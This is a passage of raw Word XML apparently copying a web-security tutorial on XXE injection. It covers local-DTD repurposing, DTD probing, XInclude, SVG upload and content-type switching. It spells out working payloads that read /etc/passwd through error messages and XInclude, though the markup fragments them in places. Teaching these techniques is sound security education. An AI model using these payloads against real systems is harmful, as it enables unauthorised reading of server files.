          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/local/app/schema.dtd</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, and this DTD file defines an entity called </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>custom_entity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. An attacker can trigger an XML parsing error message containing the contents of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> file by submitting a hybrid DTD like the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73016618"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&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B68AF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"file:///usr/local/app/schema.dtd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FE4DCB"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custom_entity</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FB4EB2"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&amp;#x25; file SYSTEM "file:///etc/passwd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3206D65C"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&lt;!ENTITY &amp;#x25; eval "&lt;!ENTITY &amp;#x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26;#</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x25; error SYSTEM &amp;#x27;file:///nonexistent/&amp;#x25;file;&amp;#x27;&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A5D24"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25;eval</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64B4001F"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&amp;#x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>25;error</w:t>
      </w:r>
      <w:proofErr w:type="gram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6875A17E"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03C13EC3"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2791661B"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1006D42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This DTD carries out the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7106AF4A" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CD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Defines an XML parameter entity called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local_dtd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, containing the contents of the external DTD file that exists on the server filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287FAE22" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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lastRenderedPageBreak/>
        <w:t>Redefines the XML parameter entity called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custom_entity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, which is already defined in the external DTD file. The entity is redefined as containing the </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:anchor="exploiting-blind-xxe-to-retrieve-data-via-error-messages" w:history="1">
        <w:r w:rsidRPr="00087CDF">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-IN"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>error-based XXE exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> that was already described, for triggering an error message containing the contents of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454818C1" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Uses the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local_dtd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> entity, so that the external DTD is interpreted, including the redefined value of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>custom_entity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> entity. This results in the desired error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA8C1C" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">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087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Locating an existing DTD file to repurpose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E12DF"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Since this XXE attack involves repurposing an existing DTD on the server filesystem, a key requirement is to locate a suitable file. This is actually quite straightforward. Because the application returns any error messages thrown by the XML parser, you can easily enumerate local DTD files just by attempting to load them from within the internal DTD.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F6C2DC"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For example, Linux systems using the GNOME desktop environment often have a DTD file at </w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/share/yelp/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>dtd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/docbookx.dtd</w:t>
      </w:r>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. You can test whether this file is present by submitting the following XXE payload, which will cause an error if the file is missing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199E6790"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&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF7B988"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 xml:space="preserve">&lt;!ENTITY % </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 xml:space="preserve"> SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7695756A" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">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087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>local_dtd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC649A2" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7803BBDE" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRPr="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00087CDF">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087CDF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>After you have tested a list of common DTD files to locate a file that is present, you then need to obtain a copy of the file and review it to find an entity that you can redefine. Since many common systems that include DTD files are open source, you can normally quickly obtain a copy of files through internet search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5B34F4" w14:textId="77777777" w:rsidR="00087CDF" w:rsidRDefault="00087CDF" w:rsidP="00B20233">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3C5E1E6A" w14:textId="46476785"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Finding hidden attack surface for XXE injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C18FFE"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Attack surface for XXE injection vulnerabilities is obvious in many cases, because the application's normal HTTP traffic includes requests that contain data in XML format. In other cases, the attack surface is less visible. However, if you look in the right places, you will find XXE attack surface in requests that do not contain any XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BDC1AF" w14:textId="77777777"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>XInclude</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBC628A"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receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a back-end SOAP request, which is then processed by the backend SOAP service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791D44BC"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In this situation, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>DOCTYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> element. However, you might be able to use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instead.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is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an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attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E2E332" w14:textId="77777777" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">
      <w:pPr>
        <w:spacing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To perform an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attack, you need to reference the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namespace and provide the path to the file that you wish to include. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0532DB98"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 xml:space="preserve">&lt;foo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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xmlns:xi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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="http://www.w3.org/2001/XInclude"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1F1563"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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>xi:include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> parse="text" </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href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>="file:///etc/passwd"/&gt;&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2269B3C3"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511DD274"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5925BB6" w14:textId="4C220B71"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20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>XXE attacks via file upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD51494"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Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents. Examples of XML-based formats are office document formats like DOCX and image formats like SVG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B836C32"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For example, an application might allow users to upload images, and process or validate these on the server after they are uploaded. Even if the application expects to receive a format like PNG or JPEG, the image processing library that is being used might support SVG images. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE2579" w14:textId="77777777" w:rsidR="00C02782" w:rsidRDefault="00C02782" w:rsidP="00B20233">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EC8E99D" w14:textId="001F9545" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">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B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>XXE attacks via modified content type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB6FB3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Most POST requests use a default content type that is generated by HTML forms, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D10669"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For example, if a normal request contains the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EFCD47"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POST /action HTTP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A2DC30"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Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B20233">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53E5C42D"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Content-Length: 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A3C8AB"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16560531"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foo=bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D11DDB2"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Then you might be able submit the following request, with the same result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3172FF02"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POST /action HTTP/1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ADC79F"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lastRenderedPageBreak/>
        <w:t>Content-Type: text/xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCFD4B5"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Content-Length: 52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C201B91" w14:textId="77777777" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">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6CE4E28" w14:textId="77777777" w:rsidR="00B20233" w:rsidRPr="00B20233" w:rsidRDefault="00B20233" w:rsidP="00B20233">
